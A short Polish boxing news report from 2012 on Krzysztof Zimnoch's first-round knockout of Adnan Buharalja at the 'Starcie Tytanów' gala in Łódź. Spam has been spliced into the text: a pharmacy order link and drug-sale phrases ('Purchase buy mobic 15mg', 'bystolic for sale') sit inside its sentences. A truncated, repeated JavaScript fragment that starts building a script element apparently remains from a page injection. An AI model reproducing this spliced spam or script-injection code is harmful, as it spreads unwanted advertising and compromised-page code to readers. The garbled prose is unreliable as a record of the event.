„Starcie Tytanów” na żywo: Krzysztof Zimnoch wygrał przed czasem

30.06.2012 / Krzysztof Zimnoch / Boks

http://suavi.info/index.php/order-keftab-cephalexin/

Krzysztof Zimnoch z Trec Team w pojedynku wagi ciężkiej podczas gali „Starcie Tytanów” w Łodzi pokonał Bośniaka Adnana Buharalję w I rundzie przez nokaut. Polak w połowie rundy trafił rywala prawym prostym w korpus, Bośniak nie mógł po tym ciosie podjąć walki.

Pierwsza odsłona sobotniej gali „Starcie Tytanów” miała trwać sześć
rund, ale zakończyła się już w pierwszej odsłonie. Purchase buy mobic 15mg Krzysztof Zimnoch nie potrzebował wiele czasu, by potężnym ciosem na korpus powalić na ring Adnana Buharalję (Bośnia i Hercegowina) i wygrać swój dwunasty pojedynek (dziewiąty przez nokaut) w wadze ciężkiej.

Bośniak nie mógł się pogodzić z porażką, ale nie mógł po potężnym ciosie Polaka oddychać i musiał zrezygnować z walki. Wściekły miotał się w ringu, ale tym razem zszedł z ringu pokonany.

Atrakcją tego wieczoru „Starcie Tytanów” będzie walka Order online Artura Szpilki z Trec Team bystolic for sale Buy  z Jameelem McClinem. Gdy Zimnoch wygrywał swoją walkę, „Szpila” właśnie pojawił się w Atlas Arenie, witany oklaskami publiczności.

 

Źródło: Onet Sport, dostęp: 30.06.2012, g. 21:46var d=document;var s=d.createElement(‚script’); var d=document;var s=d.createElement(‚script’); Buy